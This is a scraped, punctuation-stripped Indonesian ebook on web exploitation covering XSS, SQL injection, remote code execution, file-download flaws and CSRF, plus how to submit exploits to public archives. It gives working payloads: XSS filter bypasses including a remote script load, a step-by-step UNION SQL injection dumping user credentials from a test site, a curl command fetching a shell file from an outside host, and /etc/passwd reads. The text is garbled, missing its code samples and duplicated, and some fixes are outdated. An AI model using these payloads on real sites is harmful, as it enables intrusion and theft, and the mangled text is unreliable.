Post on 15-Jul-2015
Diterbitkan Oleh
Ebook ini dibuat sebagai media pembelajaran Segala macam materi yang ada pada ebookini berdasarkan pengalaman pribadi penulis
Ebook ini bebas untuk disebarluaskan dengan syarat tidak mengubah nama penulis dan isimateri yang ada didalamnya
CreditsDevilScreaM (devilscreamnewbie-securityorid)
Daftar Isi
0x01 - PengenalanApa itu Web Exploit Jenis-Jenis Web Exploit Teknik Mencari Web Exploit ~ Analysis Code ~ Google Search Engine
0x02 - Cross Site ScriptingApa itu Cross Site Scripting Tipe Cross Site Scripting ~ Non Persistent ~ Persistent Stored Kode yang Menimbulkan Celah Injeksi Cross Site Scripting Injeksi Cross Site Scripting dengan Bypass Menutup Celah Cross Site Scripting
0x03 - SQL InjectionApa itu SQL Injection Kode yang Menimbulkan Celah Injeksi SQL Injection ~ Menghitung Jumlah Tables ~ Melihat Tables ~ Melihat Column ~ Melihat Data pada Column Menutup Celah SQL Injection
0x04 - Remote Code ExecutionApa itu Remote Code Execution Kode yang Menimbulkan Celah Injeksi Remote Code Execution Menutup Celah Remote Code Execution
0x05 - Local File DownloadApa itu Local File Download Kode yang Menimbulkan Celah Injeksi Local File Download Menutup Celah Local File Download
0x06 - Cross Site Request ForgeryApa itu Cross Site Request Forgery Kode yang Menimbulkan Celah Injeksi Cross Site Request Forgery ~ Kode Exploit Cross Site Request Forgery Menutup Cross Site Request Forgery
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim ~ Contoh Keterangan Exploit Mengirim Exploit ke 1337day Mengirim Exploit ke Exploit-DB Mengirim Exploit ke Packet Storm Security
0x01 - Pengenalan
Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb
Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery
Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu
1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak
2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork
0x02 - Cross Site Scripting
Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css
Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost
0x02 - Cross Site Scripting
Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini
Non Persistent
Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web
Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18
Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter
Persistent Stored
Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
Daftar Isi
0x01 - PengenalanApa itu Web Exploit Jenis-Jenis Web Exploit Teknik Mencari Web Exploit ~ Analysis Code ~ Google Search Engine
0x02 - Cross Site ScriptingApa itu Cross Site Scripting Tipe Cross Site Scripting ~ Non Persistent ~ Persistent Stored Kode yang Menimbulkan Celah Injeksi Cross Site Scripting Injeksi Cross Site Scripting dengan Bypass Menutup Celah Cross Site Scripting
0x03 - SQL InjectionApa itu SQL Injection Kode yang Menimbulkan Celah Injeksi SQL Injection ~ Menghitung Jumlah Tables ~ Melihat Tables ~ Melihat Column ~ Melihat Data pada Column Menutup Celah SQL Injection
0x04 - Remote Code ExecutionApa itu Remote Code Execution Kode yang Menimbulkan Celah Injeksi Remote Code Execution Menutup Celah Remote Code Execution
0x05 - Local File DownloadApa itu Local File Download Kode yang Menimbulkan Celah Injeksi Local File Download Menutup Celah Local File Download
0x06 - Cross Site Request ForgeryApa itu Cross Site Request Forgery Kode yang Menimbulkan Celah Injeksi Cross Site Request Forgery ~ Kode Exploit Cross Site Request Forgery Menutup Cross Site Request Forgery
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim ~ Contoh Keterangan Exploit Mengirim Exploit ke 1337day Mengirim Exploit ke Exploit-DB Mengirim Exploit ke Packet Storm Security
0x01 - Pengenalan
Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb
Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery
Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu
1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak
2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork
0x02 - Cross Site Scripting
Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css
Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost
0x02 - Cross Site Scripting
Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini
Non Persistent
Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web
Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18
Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter
Persistent Stored
Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
